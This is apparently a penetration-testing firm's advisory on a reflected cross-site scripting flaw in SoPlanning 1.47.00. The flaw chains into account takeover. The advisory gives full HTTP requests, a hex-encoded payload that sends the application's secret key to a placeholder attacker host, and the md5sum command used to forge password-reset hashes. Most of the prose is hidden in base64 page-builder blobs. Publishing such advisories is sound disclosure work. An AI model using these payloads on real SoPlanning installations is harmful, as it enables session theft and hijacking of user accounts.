Research

XSS to Account Takeover – SoPlanning Software

Researchers:

Nour Alomary

Background

Modern applications typically rely on user input to provide the required functionality to the user. In doing so, the application accepts data from an untrusted source. In some circumstances, this data is processed and output to the end user. In other cases, this data is stored by the application for retrieval at a later stage, or for the viewing of other application users or passing onto other services in order to carry out the user request. Cross-Site Scripting is a vulnerability resulting from the lack of or inadequate sanitisation carried out on user supplied data which is then later rendered back to a user.

When an application includes user-supplied data in its HTTP response without proper sanitisation, any HTML or JavaScript included within that data would be executed when the response is rendered in the user’s browser. This behaviour could be leveraged by an attacker in order to compromise user sessions within the application. This could allow the attacker to impersonate legitimate users through session hijacking. They could also carry out unauthorised actions in the current user context or access data processed by the application.

A variation of Cross-Site Scripting exists which stores the payload in the application which is executed every time the vulnerable parameter is rendered, this is known as stored Cross-Site Scripting.

Details

SoPlanning v1.47.00 was vulnerable to a reflected Cross-Site Scripting vulnerability which when combined with other flaws in the application allowed for a successful account takeover attack. The details below describe each issue and how it led to an attacker performing a password reset for any account within the application.

The following page was vulnerable to a cross site scripting attack using the ‘by’ URL parameter. The request below showed the injected JavaScript payload which when executed showed the current user’s session cookies as shown in Figure 1:

				
					GET
/soplanning/www/taches.php?order=titre&by=test%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!-- HTTP/1.1
Host: 192.168.0.90
[...]
Cookie: dateDebut=02/09/2020; dateFin=02/11/2020; xposMoisWin=0; xposJoursWin=0; yposJoursWin=0; yposMoisWin=0; PHPSESSID=jf7pcv7o25upt9qga1f1hosq11; soplanningplanning_=tpbvfnhe1hqftau0oktue7505c; baseLigne=users; baseColonne=jours; date_debut_affiche_tache=02%2F09%2F2020; date_fin_affiche_tache=02%2F11%2F2020
XSS to Account Takeover – SoPlanning - XSS Cookie

Figure 1 – XSS Cookie

The following was the response which showed the XSS payload rendered in the document:

				
					
HTTP/1.1 200 OK
Date: Thu, 03 Sep 2020 10:12:02 GMT
[...]
</form> <div class="row"> <div class="col-md-12"> <div class="soplanning-box mt-2"> <table class="table table-striped table-hover" id="taskTab"> <thead> <tr> <th colspan="3"> <a href="?order=nom&by=test"><script>alert(document.cookie)</script><!--">Tasks (0)</a> </th>
[...]
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6ImQwMGQ4NGQiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5JbmRlcGVuZGVudGx5LCB0aGlzIHZ1bG5lcmFiaWxpdHkgd291bGQgYWxsb3cgYW4gYXR0YWNrZXIgdG8gc3RlYWwgdGhlIHNlc3Npb24gY29va2llcyBmb3IgYW4gYXV0aGVudGljYXRlZCB1c2VyIHdoaWNoIHdvdWxkIGdyYW50IHRoZW0gdGhlIHNhbWUgYWNjZXNzIGFzIHRoZSB0YXJnZXQgdXNlci4gSXQgY291bGQgYWxzbyBiZSB1c2VkIHRvIGxvYWQgYW5kIGV4ZWN1dGUgbWFsaWNpb3VzIGNvZGUgd2l0aGluIHRoZSBhcHBsaWNhdGlvbiBvciBzaW1wbHkgYmUgdXNlZCB0byB0YXJnZXQgdGhlIHVzZXJcdTIwMTlzIGJyb3dzZXIuPGJyIFwvPjxiciBcLz5Ib3dldmVyLCB0aGlzIHZ1bG5lcmFiaWxpdHkgd2FzIGV4cGxvaXRlZCB0byBncmFudCB0aGUgYXR0YWNrZXIgcGVyc2lzdGVudCBhY2Nlc3MgdG8gdGhlIGFwcGxpY2F0aW9uIHRoZXJlYnkgaW5jcmVhc2luZyB0aGUgc2V2ZXJpdHkgYW5kIGltcGFjdC4gVGhpcyB3YXMgbWFkZSBwb3NzaWJsZSBkdWUgdG8gdGhlIHdheSB0aGUgYXBwbGljYXRpb24gY2FycmllZCBvdXQgcGFzc3dvcmQgcmVzZXQgcmVxdWVzdHMuPGJyIFwvPjxiciBcLz5CeSByZXZlcnNlIGVuZ2luZWVyaW5nIHRoZSBwYXNzd29yZCByZXNldCBwcm9jZXNzIHVzaW5nIHRoZSBmb2xsb3dpbmcgc25pcHBldCBmcm9tIHRoZSBjbGFzc191c2VyLmluYyBmaWxlOjxcL3A+In0sImVsZW1lbnRzIjpbXSwid2lkZ2V0VHlwZSI6InRleHQtZWRpdG9yIn0="] 
				
					
public function mailChangerPwd() {
    if(is_null($this->email) ||is_null($this->login)) {
            return true;
    } $smarty = new MySmarty();
    $sujet = CONFIG_SOPLANNING_TITLE . ' - ' . $smarty->getConfigVars('mail_sujet_changerPwd');
    if (CONFIG_SOPLANNING_URL != '')
    {
        $smarty->assign('lien', CONFIG_SOPLANNING_URL .
/change_password.php?user_id=' . $this->user_id . '&date=' . date('Y-m-d') . '&hash=' . md5($this->user_id . '􀳦' . date('Y-m-d') . '􀳦' . CONFIG_SECURE_KEY));
        }else
        {[...]
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6IjNmMDM5OTkiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5JdCB3YXMgbm90ZWQgdGhhdCB0aGUgZm9sbG93aW5nIHBhcmFtZXRlcnMgd2VyZSByZXF1aXJlZCB0byBjcmVhdGUgdGhlIHBhc3N3b3JkIHJlc2V0IFVSTCBzZW50IHRvIHRoZSB1c2VyXHUyMDE5cyBlbWFpbCBhZGRyZXNzIHdoZW4gdGhleSBjYXJyeSBvdXQgYSBwYXNzd29yZCByZXNldC48YnIgXC8+PGJyIFwvPlx1MjNhZiBVc2VyX2lkIFx1MjAxMyBUaGUgdXNlcl9pZCwgdGhpcyBjYW4gYmUgZm91bmQgYnkgYW4gYXBwbGljYXRpb24gdXNlciwgb3Igc2ltcGx5IGd1ZXNzZWQsIGFuIG9yZ2FuaXNhdGlvbiBtYXkgaGF2ZSBhIHN0YW5kYXJkIG5hbWluZyBjb252ZW50aW9uIHNvIGl0IHdvdWxkIGJlIHBvc3NpYmxlIHRvIGd1ZXNzIHRoZSB0YXJnZXQgdXNlcl9pZDxiciBcLz5cdTIzYWYgRGF0ZSBcdTIwMTMgVGhlIGRhdGUsIHRoaXMgaXMgdGhlIGRhdGUgdGhlIHBhc3N3b3JkIHJlc2V0IHJlcXVlc3Qgd2FzIG1hZGUgaW4gdGhlIGZvcm1hdCAoeS1tLWQpPGJyIFwvPlx1MjNhZiBDT05GSUdfU0VDVVJFX0tFWSBcdTIwMTMgYW4gYWRtaW5pc3RyYXRvciB1c2VyIGhhcyBhY2Nlc3MgdG8gdGhpcyBrZXkuIEJ5IGV4cGxvaXRpbmcgdGhlIFhTUyBmbGF3IGRldGFpbGVkIGFib3ZlLCBpdCB3YXMgcG9zc2libGUgdG8gcmV0cmlldmUgdGhpcyB2YWx1ZS48YnIgXC8+PGJyIFwvPlRoZSBmb2xsb3dpbmcgcGF5bG9hZCB3YXMgdXNlZCB0byBleGZpbHRyYXRlIHRoZSBDT05GSUdfU0VDVVJFX0tFWSB0byBhbiBhdHRhY2tlci1jb250cm9sbGVkIHNlcnZlcjo8XC9wPiJ9LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0ZXh0LWVkaXRvciJ9"] 
				
					
GET
/soplanning/www/taches.php?order=titre&by=test%22%3E%3c%73%63%72%69%70%74%3e%20%76%61%72%20%78%68%74%74%70%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%20%78%68%74%74%70%2e%6f%6e%72%65%61%64%79%73%74%61%74%65%63%68%61%6e%67%65%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%20%69%66%20%28%74%68%69%73%2e%72%65%61%64%79%53%74%61%74%65%20%3d%3d%20%34%20%26%26%20%74%68%69%73%2e%73%74%61%74%75%73%20%3d%3d%20%32%30%30%29%20%7b%20%76%61%72%20%64%6f%63%20%3d%20%78%68%74%74%70%2e%72%65%73%70%6f%6e%73%65%3b%20%76%61%72%20%63%6f%6e%66%4b%65%79%20%3d%20%64%6f%63%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%43%4f%4e%46%49%47%5f%53%45%43%55%52%45%5f%4b%45%59%22%29%3b%20%61%6c%65%72%74%28%63%6f%6e%66%4b%65%79%2e%76%61%6c%75%65%29%3b%7d%7d%3b%20%78%68%74%74%70%2e%6f%70%65%6e%28%22%47%45%54%22%2c%20%22%2f%73%6f%70%6c%61%6e%6e%69%6e%67%2f%77%77%77%2f%6f%70%74%69%6f%6e%73%2e%70%68%70%22%2c%20%74%72%75%65%29%3b%20%78%68%74%74%70%2e%72%65%73%70%6f%6e%73%65%54%79%70%65%20%3d%20%22%64%6f%63%75%6d%65%6e%74%22%3b%20%78%68%74%74%70%2e%73%65%6e%64%28%29%3b%3c%2f%73%63%72%69%70%74%3e HTTP/1.1
Host: 192.168.0.90
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: dateDebut=02/09/2020; dateFin=02/11/2020; xposMoisWin=0; xposJoursWin=0; yposJoursWin=0; yposMoisWin=0; PHPSESSID=jf7pcv7o25upt9qga1f1hosq11; soplanningplanning_=tpbvfnhe1hqftau0oktue7505c; baseLigne=users; baseColonne=jours; date_debut_affiche_tache=02%2F09%2F2020; date_fin_affiche_tache=02%2F11%2F2020
Connection: close
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6IjIzOWRmYjEiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5UaGUgZm9sbG93aW5nIHJlc3BvbnNlIGNvbnRhaW5lZCB0aGUgZGVjb2RlZCBwYXlsb2FkIHdoaWNoIG1hZGUgYSByZXF1ZXN0IHRvIHRoZSBwYWdlIGNvbnRhaW5pbmcgdGhlIENPTkZJR19TRUNVUkVfS0VZLCB0aGUgdmFsdWUgd2FzIGV4dHJhY3RlZCBhbmQgc2VudCB0byB0aGUgYXR0YWNrZXItY29udHJvbGxlZCBzZXJ2ZXI6PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ=="] 
				
					
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2020 17:37:06 GMT
Server: Apache/2.4.46 (Unix) OpenSSL/1.1.1d
X-Powered-By: PHP/7.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 27812
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html> <html lang="fr">
[...]
<div class="row"> <div class="col-md-12"> <div class="soplanning-box mt-2"> <table class="table table-striped table-hover" id="taskTab"> <thead> <tr> <th colspan="3"> <a href="?order=nom&by=test"><script>
var request = new XMLHttpRequest();
request.open("GET", "/soplanning/www/options.php", true);
request.responseType = "document"; request.send();
request.onreadystatechange = function() {
    if (request.readyState == 4) {
        var doc = request.response;
        var elem = doc.getElementById("CONFIG_SECURE_KEY");
        new Image().src="http://<ATTACKERIP>/config.html?key="+elem.value;
        }
}
</script>">Tasks (0)</a>
[...]
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6IjVmYTMxOWEiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5GaWd1cmUgMiBzaG93ZWQgdGhlIFhTUyBwYXlsb2FkIHN1Y2Nlc3NmdWxseSBleGVjdXRpbmcgYW5kIHNlbmRpbmcgdGhlIHJlcXVpcmVkIGtleS48XC9wPiJ9LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0ZXh0LWVkaXRvciJ9"]
XSS to Account Takeover – SoPlanning - Config secure key sent to attack server
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6ImM2MDVlM2YiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD48aT5GaWd1cmUgMiBcdTIwMTMgQ09ORklHX1NFQ1VSRV9LRVkgU2VudCBUbyBBdHRhY2tlciBTZXJ2ZXI8YnIgXC8+PFwvaT48YnIgXC8+VG8gZGVtb25zdHJhdGUgdGhlIGFjY291bnQgdGFrZW92ZXIsIGEgdGVzdCBhY2NvdW50IHdhcyBjcmVhdGVkIGZvciBhIHVzZXIgdXNpbmcgdGhlIGRldGFpbHMgc2hvd24gaW4gRmlndXJlIDMuPFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ=="]
XSS to Account Takeover – SoPlanning - Test account details
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6IjI0MjQ1ZjMiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD48aT5GaWd1cmUgMyBcdTIwMTMgVGVzdCBBY2NvdW50IERldGFpbHM8XC9pPjxiciBcLz48YnIgXC8+VGhlIGZvbGxvd2luZyByZXF1ZXN0IHdhcyBtYWRlIHRvIHJlc2V0IHRoZSBwYXNzd29yZCBmb3IgdGhlIHRlc3QgdXNlcjo8XC9wPiJ9LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0ZXh0LWVkaXRvciJ9"] 
				
					
POST /soplanning/www/process/xajax_server.php HTTP/1.1
Host: 192.168.0.90
[...]
xajax=changerPwd&xajaxr=1599125022510&xajaxargs[]=test%40test.com
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6ImYxOTY4NmQiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5UaGUgZm9sbG93aW5nIHJlc3BvbnNlIHNob3dlZCB0aGF0IHRoZSByZXF1ZXN0IHdhcyBzdWNjZXNzZnVsOjxcL3A+In0sImVsZW1lbnRzIjpbXSwid2lkZ2V0VHlwZSI6InRleHQtZWRpdG9yIn0="] 
				
					
HTTP/1.1 200 OK
Date: Thu, 03 Sep 2020 09:23:42 GMT
Server: Apache/2.4.46 (Unix) OpenSSL/1.1.1d
X-Powered-By: PHP/7.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 169
Connection: close
Content-Type: text/xml; charset=ISO-8859-1

<?xml version="1.0" encoding="utf-8" ?><xjx><cmd n="al"><![CDATA[Verify your mail inbox, you will be able to change your password with the email just sent]]></cmd></xjx>
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6IjVhNmM3NDQiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5UaGUgbmV4dCBzdGVwIHdhcyB0byBtYW51YWxseSBnZW5lcmF0ZSB0aGUgcGFzc3dvcmQgY2hhbmdlIFVSTCBmb3IgdGhlIHRlc3QgdXNlcjo8XC9wPiJ9LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0ZXh0LWVkaXRvciJ9"] 
				
					
change_password.php?user_id=test&date=2020-09-03&hash=<MD5Hash>
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6ImRkZjRjOTIiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5UaGUgaGFzaCBwYXJhbWV0ZXIgd2FzIG1hZGUgdXAgb2YgdGhlIGZvbGxvd2luZyB2YWx1ZXMgdGhlbiBoYXNoZWQgdXNpbmcgdGhlIE1ENSBhbGdvcml0aG06PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ=="] 
				
					
test¤2020-09-03¤8e45be46a1976b30a9187cf4280040db
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6ImRhYjExYzUiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5UaGUgZm9sbG93aW5nIGNvbW1hbmQgd2FzIHVzZWQgdG8gZ2VuZXJhdGUgdGhlIHJlcXVpcmVkIGhhc2ggcGFyYW1ldGVyOjxcL3A+In0sImVsZW1lbnRzIjpbXSwid2lkZ2V0VHlwZSI6InRleHQtZWRpdG9yIn0="] 
				
					
$echo -ne 'test\xa42020-09-03\xa48e45be46a1976b30a9187cf4280040db' | md5sum
6af82d3711eb2800ecf9c348a2f8e45f
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6ImQwZDU2MTMiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5XaXRoIHRoZSBuZXdseSBnZW5lcmF0ZWQgcGFzc3dvcmQgcmVzZXQgbGluayBmb3IgdGhlIHRlc3QgdXNlciwgdGhlIGZvbGxvd2luZyByZXF1ZXN0IHdhcyBtYWRlIHRvIHRoZSBhcHBsaWNhdGlvbjo8XC9wPiJ9LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0ZXh0LWVkaXRvciJ9"] 
				
					
GET /soplanning/www/change_password.php?user_id=test&date=2020-09-03&hash=6af82d3711eb2800ecf9c348a2f8e45f HTTP/1.1
Host: 192.168.0.90
[...]
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6IjkyYmMwNjYiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5UaGUgZm9sbG93aW5nIHJlc3BvbnNlIGFuZCBGaWd1cmUgNCBzaG93ZWQgdGhhdCBpdCB3YXMgcG9zc2libGUgdG8gcmVzZXQgdGhlIHBhc3N3b3JkIGZvciB0aGUgdGFyZ2V0IHVzZXI6PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ=="] 
				
					
HTTP/1.1 200 OK
Date: Thu, 03 Sep 2020 09:43:40 GMT
Connection: close
Content-Type: text/html; charset=iso-8859-1
[...]
        </style> </head> <body> <link href="assets/css/simplePage.css" rel="stylesheet"> <br /><br /> <div class="container"> <h3 class="text-center"> <span class="soplanning_index_title2">Simple Online Planning</span> <small>v1.47.00</small> </h3> <div class="small-container"> <form action="process/login.php" method="post" class="form-horizontal box"> <div class="form-group row col-md-12"> <label for="login" class="col-md-4 col-sm-4 control-label">Login :</label> <div class="col-md-8 col-sm-8">
                test
            </div> </div> <div class="form-group row col-md-12"> <label for="password" class="col-md-4 col-sm-4 control-label">New password :</label> <div class="col-md-8 col-sm-8"> <input type="password" size="20" name="password" class="form-control" id="password">
[...]
XSS to Account Takeover – SoPlanning - Password change form
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6ImM2Y2E3ZTEiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD48aT5GaWd1cmUgNCBcdTIwMTMgUGFzc3dvcmQgQ2hhbmdlIEZvcm0gRm9yIFRlc3QgVXNlcjxcL2k+PFwvcD48cD5UaGUgZm9sbG93aW5nIHJlcXVlc3QgY29udGFpbmVkIHRoZSBuZXcgcGFzc3dvcmQgZm9yIHRoZSB0ZXN0IHVzZXI6PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ=="] 
				
					
POST /soplanning/www/process/xajax_server.php HTTP/1.1
Host: 192.168.0.90
Origin: http://192.168.0.90
Referer:
http://192.168.0.90/soplanning/www/change_password.php?user_id=test&date=2020-09-03&hash=6af82d3711eb2800ecf9c348a2f8e45f
[...]
xajax=nouveauPwd&xajaxr=1599126582871&xajaxargs[]=admin
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6ImMwNjlkMDciLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5Gb2xsb3dpbmcgdGhlIHBhc3N3b3JkIGNoYW5nZSByZXF1ZXN0LCB0aGUgZm9sbG93aW5nIGxvZ2luIHJlcXVlc3Qgd2FzIG1hZGUgd2l0aCBuZXcgcGFzc3dvcmQ6PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ=="] 
				
					
POST /soplanning/www/process/login.php HTTP/1.1
Host: 192.168.0.90
[...]
login=test&password=admin
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6IjRkYjJjMjkiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5UaGUgcmVzcG9uc2UgYmVsb3cgaW5kaWNhdGVkIHRoYXQgdGhlIGxvZ2luIGF0dGVtcHQgd2FzIHN1Y2Nlc3NmdWw6PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ=="] 
				
					
HTTP/1.1 302 Found
Date: Thu, 03 Sep 2020 09:49:49 GMT
Server: Apache/2.4.46 (Unix) OpenSSL/1.1.1d
X-Powered-By: PHP/7.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: baseLigne=users; expires=Sun, 16-Jan-2022 09:49:49 GMT; Max-Age=43200000; path=/
Set-Cookie: baseColonne=jours; expires=Sun, 16-Jan-2022 09:49:49 GMT; Max-Age=43200000; path=/
Location: ../planning.php
[elementor-element k="b890e74fa95bc4a4b6659f841dcfa390" data="eyJpZCI6IjM3MTE0YmIiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD5UaGlzIHByb2Nlc3MgY2FuIGJlIHJlcGVhdGVkIHdpdGggYW55IGFwcGxpY2F0aW9uIHVzZXIgYXMgbG9uZyBhcyB0aGUgYXR0YWNrZXIga25vd3MgdGhlIGVtYWlsIGFkZHJlc3MgYW5kIHVzZXJfaWQgb2YgdGhlIHRhcmdldC4gVGhpcyBpbmZvcm1hdGlvbiBpcyB1c3VhbGx5IGVhc3kgdG8gaWRlbnRpZnkgd2l0aCByZWNvbm5haXNzYW5jZS48XC9wPjxwPkFsdGhvdWdoIGNhcnJ5aW5nIG91dCBhIHBhc3N3b3JkIHJlc2V0IGdlbmVyYXRlcyBhbiBlbWFpbCB0byB0aGUgdXNlciwgYW4gYXR0YWNrZXIgY2FuIGNhcnJ5IG91dCB0aGlzIGF0dGFjayBkdXJpbmcgYSB0aW1lIHdoaWNoIHRoZSB1c2VyIGlzIGxpa2VseSBub3QgdG8gaGF2ZSBhY2Nlc3MgdG8gdGhlaXIgZW1haWwuPFwvcD48aDI+PGI+UmlzayBBbmFseXNpczxcL2I+PFwvaDI+PHA+UmlzayBDYXRlZ29yeTogSGlnaDxiciBcLz5DVlNTdjI6IDguNSBBVjpOXC9BQzpNXC9BdTpTXC9DOkNcL0k6Q1wvQTpDPGJyIFwvPkNWU1N2MzpcdTAwYTA4LjggQVY6TlwvQUM6TFwvUFI6TlwvVUk6UlwvUzpVXC9DOkhcL0k6SFwvQTpIPFwvcD48aDI+PGI+QWZmZWN0ZWQgaXRlbTxcL2I+PFwvaDI+PHA+U09QbGFubm5pbmcgdmVyc2lvbiAxLjQ3IGFuZCBsb3dlcjxcL3A+PGgyPjxiPlJlY29tbWVuZGF0aW9uPFwvYj48XC9oMj48cD5VcGRhdGUgdG8gU09QbGFubm5pbmcgVmVyc2lvbiAxLjQ4PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ=="]

The latest Pentest research and insights

Looking for more than just a pen test provider?

Get in touch with our team and find out how our tailored services can provide you with the cybersecurity confidence you need.

Contact us today >